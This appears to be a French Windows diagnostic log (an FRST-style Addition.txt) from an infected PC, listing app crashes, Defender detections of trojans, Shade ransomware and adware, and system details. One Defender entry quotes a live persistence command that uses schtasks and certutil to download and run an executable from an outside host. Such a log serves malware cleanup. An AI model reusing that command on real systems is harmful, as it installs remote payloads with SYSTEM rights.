E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe ID de rapport : d1368d0a-c808-44e2-b772-7b71f0e3affd Nom complet du package défectueux : ID de l'application relative à un package défectueux : Type de blocage : Unknown Error: (06/04/2019 07:00:12 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme SkypeApp.exe version 8.46.0.60 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance. ID de processus : 1f18 Heure de début : 01d51af3b7f58299 Heure d'arrêt : 4294967295 Chemin d'accès à l'application : C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeApp.exe ID de rapport : 0d69ff58-c0e5-4bf5-97a4-5415d1d62d6c Nom complet du package défectueux : Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c ID de l'application relative à un package défectueux : App Type de blocage : Quiesce Error: (06/04/2019 06:38:29 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme AvastUI.exe version 19.5.4444.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance. ID de processus : 2558 Heure de début : 01d51af3bf717b9c Heure d'arrêt : 6904 Chemin d'accès à l'application : C:\Program Files\AVAST Software\Avast\AvastUI.exe ID de rapport : 5e48dacc-4573-4152-bfed-16d12c5227fa Nom complet du package défectueux : ID de l'application relative à un package défectueux : Type de blocage : Unknown Error: (06/04/2019 06:37:49 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante Explorer.EXE, version : 10.0.17763.348, horodatage : 0x03d46193 Nom du module défaillant : ntdll.dll, version : 10.0.17763.475, horodatage : 0x3230aa04 Code d’exception : 0xc0000374 Décalage d’erreur : 0x00000000000fb049 ID du processus défaillant : 0x15e4 Heure de début de l’application défaillante : 0x01d51af3b5c65531 Chemin d’accès de l’application défaillante : C:\Windows\Explorer.EXE Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll ID de rapport : 998d124d-7db6-462e-a9d2-8a350ac1e03c Nom complet du package défaillant : ID de l’application relative au package défaillant : Error: (06/04/2019 02:36:10 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante Explorer.EXE, version : 10.0.17763.348, horodatage : 0x03d46193 Nom du module défaillant : ntdll.dll, version : 10.0.17763.475, horodatage : 0x3230aa04 Code d’exception : 0xc0000374 Décalage d’erreur : 0x00000000000fb049 ID du processus défaillant : 0x1664 Heure de début de l’application défaillante : 0x01d51a6d5c1f7105 Chemin d’accès de l’application défaillante : C:\Windows\Explorer.EXE Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll ID de rapport : 40c8bd3e-b167-4944-aa9e-d75cf446c064 Nom complet du package défaillant : ID de l’application relative au package défaillant : Error: (06/04/2019 02:14:55 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Le programme AvastUI.exe version 19.5.4444.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance. ID de processus : 2b60 Heure de début : 01d51a6a1c9418f6 Heure d'arrêt : 25773 Chemin d'accès à l'application : C:\Program Files\AVAST Software\Avast\AvastUI.exe ID de rapport : f7b348ed-56c0-4d8a-b1bc-d05e34a8f3b7 Nom complet du package défectueux : ID de l'application relative à un package défectueux : Type de blocage : Unknown Error: (06/04/2019 02:10:08 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante vtbdbvvh.exe, version : 2.4.4.6, horodatage : 0x5cefb9f6 Nom du module défaillant : vtbdbvvh.exe, version : 2.4.4.6, horodatage : 0x5cefb9f6 Code d’exception : 0xc0000409 Décalage d’erreur : 0x00035b55 ID du processus défaillant : 0x3600 Heure de début de l’application défaillante : 0x01d51a69da63b055 Chemin d’accès de l’application défaillante : C:\Users\Luca\AppData\Roaming\Microsoft\Windows\sdwjgejg\vtbdbvvh.exe Chemin d’accès du module défaillant: C:\Users\Luca\AppData\Roaming\Microsoft\Windows\sdwjgejg\vtbdbvvh.exe ID de rapport : 63bd1934-2a6c-4a73-8c1e-bdaead651820 Nom complet du package défaillant : ID de l’application relative au package défaillant : Erreurs système: ============= Error: (06/05/2019 09:55:42 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA) Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur. Error: (06/05/2019 09:55:39 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA) Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (06/05/2019 09:55:05 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA) Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur. Error: (06/05/2019 09:55:00 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA) Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur. Error: (06/05/2019 09:54:46 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA) Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur. Error: (06/05/2019 09:54:46 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA) Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur. Error: (06/05/2019 09:53:39 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA) Description: Le serveur {E48EDA45-43C6-48E0-9323-A7B2067D9CD5} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (06/05/2019 09:51:39 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA) Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Windows Defender: =================================== Date: 2019-06-04 02:01:52.845 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Socelar&threatid=2147734469&enterprise=0 Nom : TrojanDownloader:Win32/Socelar ID : 2147734469 Gravité : Grave Catégorie : Cheval de Troie téléchargeur Chemin : file:_C:\Users\Luca\AppData\Local\Temp\266812\ic-0.36f8c955369b88.exe Origine de la détection : Ordinateur local Type de détection : Concret Source de détection : Protection en temps réel Utilisateur : PC-DE-LUCA\Luca Nom du processus : C:\Users\Luca\AppData\Local\Temp\Rar$EXb2992.33967\squeezehack.exe Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0 Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0 Date: 2019-06-04 02:01:50.847 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Nom : Trojan:Win32/Ceprolad.A ID : 2147726914 Gravité : Grave Catégorie : Cheval de Troie Chemin : CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://nevernews.club/app/app.exe C:\Users\Luca\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Luca\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Origine de la détection : Inconnu Type de détection : Concret Source de détection : Système Utilisateur : AUTORITE NT\Système Nom du processus : Unknown Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0 Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0 Date: 2019-06-04 02:01:19.420 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/CryptInject&threatid=2147725859&enterprise=0 Nom : Trojan:Win32/CryptInject ID : 2147725859 Gravité : Grave Catégorie : Cheval de Troie Chemin : file:_C:\Users\Luca\AppData\Local\Temp\uu35glec.00c\seescenicelfb.exe Origine de la détection : Ordinateur local Type de détection : Concret Source de détection : Protection en temps réel Utilisateur : PC-DE-LUCA\Luca Nom du processus : C:\Users\Luca\AppData\Local\Temp\YLHXUI273Z\YLHX.exe Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0 Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0 Date: 2019-06-04 02:01:01.554 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Ransom:Win32/Shade.C&threatid=2147735695&enterprise=0 Nom : Ransom:Win32/Shade.C ID : 2147735695 Gravité : Grave Catégorie : Ransomware Chemin : file:_C:\Users\Luca\AppData\Local\Temp\bjvieyra.1bh\netstream.exe; file:_C:\Users\Luca\AppData\Local\Temp\u5k1w5w0.ttd\netstream.exe Origine de la détection : Ordinateur local Type de détection : Concret Source de détection : Protection en temps réel Utilisateur : PC-DE-LUCA\Luca Nom du processus : C:\Users\Luca\AppData\Local\Temp\YLHXUI273Z\YLHX.exe Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0 Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0 Date: 2019-06-04 02:00:58.370 Description: Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable. Pour plus d’informations, reportez-vous aux éléments suivants : https://go.microsoft.com/fwlink/?linkid=37020&name=Adware:Win64/CloudGuard&threatid=250533&enterprise=0 Nom : Adware:Win64/CloudGuard ID : 250533 Gravité : Élevée Catégorie : Logiciel de publicité Chemin : file:_C:\Program Files\Homeville\Homeville.exe Origine de la détection : Ordinateur local Type de détection : Concret Source de détection : Protection en temps réel Utilisateur : PC-DE-LUCA\Luca Nom du processus : C:\Users\Luca\AppData\Local\Temp\is-J8HF5.tmp\Hermond.tmp Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0 Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0 Date: 2019-06-04 01:54:34.346 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.283.1577.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15500.2 Code d’erreur : 0x80240022 Description de l’erreur : Le programme ne peut pas rechercher les mises à jour de définitions. Date: 2019-06-04 01:54:34.345 Description: Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures. Nouvelle version de la signature : Version précédente de la signature : 1.283.1577.0 Source de mise à jour : Serveur Microsoft Update Type de signature : Anti-virus Type de mise à jour : Complet Utilisateur : AUTORITE NT\Système Version actuelle du moteur : Version précédente du moteur : 1.1.15500.2 Code d’erreur : 0x80240022 Description de l’erreur : Le programme ne peut pas rechercher les mises à jour de définitions. CodeIntegrity: =================================== Date: 2019-06-04 21:51:52.601 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-06-04 21:51:52.599 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-06-04 21:51:52.591 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-06-04 21:51:52.589 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-06-04 21:51:51.770 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SearchIndexer.exe) attempted to load \Device\HarddiskVolume4\ProgramData\Quoteex\Sailin.dll that did not meet the Microsoft signing level requirements. Date: 2019-06-04 21:10:55.964 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-06-04 21:10:55.962 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-06-04 21:10:55.951 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Infos Mémoire =========================== BIOS: American Megatrends Inc. A.20 09/21/2018 Motherboard: Micro-Star International Co., Ltd B450-A PRO (MS-7B86) Processeur: AMD Ryzen 5 2600 Six-Core Processor Pourcentage de mémoire utilisée: 69% Mémoire physique - RAM - totale: 8143.08 MB Mémoire physique - RAM - disponible: 2515.27 MB Mémoire virtuelle totale: 19919.08 MB Mémoire virtuelle disponible: 10025.01 MB ==================== Lecteurs ================================ Drive c: () (Fixed) (Total:222.97 GB) (Free:2.5 GB) NTFS Drive d: (PC136) (CDROM) (Total:6.88 GB) (Free:0 GB) UDF Drive e: (Donnees) (Fixed) (Total:931.5 GB) (Free:551.89 GB) NTFS Drive f: (My CDROM) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS \\?\Volume{d40a1865-ed47-4c13-a2dc-df0bf8f6c155}\ (Récupération) (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS \\?\Volume{ad378aa8-6064-450e-abd2-065fc4bde4c1}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32 ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000) Partition: GPT. ======================================================== Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== Fin de Addition.txt ============================